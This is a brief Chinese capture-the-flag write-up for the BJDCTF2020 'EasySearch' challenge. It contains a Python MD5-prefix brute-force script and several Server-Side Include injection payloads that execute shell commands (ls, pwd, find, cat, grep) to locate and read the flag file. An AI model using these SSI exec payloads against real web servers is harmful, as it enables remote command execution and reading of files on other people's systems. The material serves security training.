[BJDCTF2020]EasySearch

[BJDCTF2020]EasySearch

import random
import hashlib

for passwd in range(1,10**7):
	passwd = str(passwd)
	now = hashlib.md5(passwd.encode('utf-8')).hexdigest()
	#print(now[:6])
	if(now[:6] =="6d0bc1"):
		print(passwd)
		break
	

ssi漏洞

https://blog.csdn.net/qq_40657585/article/details/84260844

扫描当前目录

<!--#exec cmd="ls"-->

查看当前目录

<!--#exec cmd="pwd"-->

如果文件名叫flag***那么可以找文件

<!--#exec cmd="find / -type f -name flag*"-->

image-20200514220320147

cat flag

<!--#exec cmd="cat /var/www/html/flag_990c66bf85a09c664f0b6741840499b2"-->

image-20200514220420571

或者,但是这个没有测试出来的亚子

<!--#exec cmd="find / -type f | xargs grep flag{"-->

原文地址:https://www.cnblogs.com/h3zh1/p/12891831.html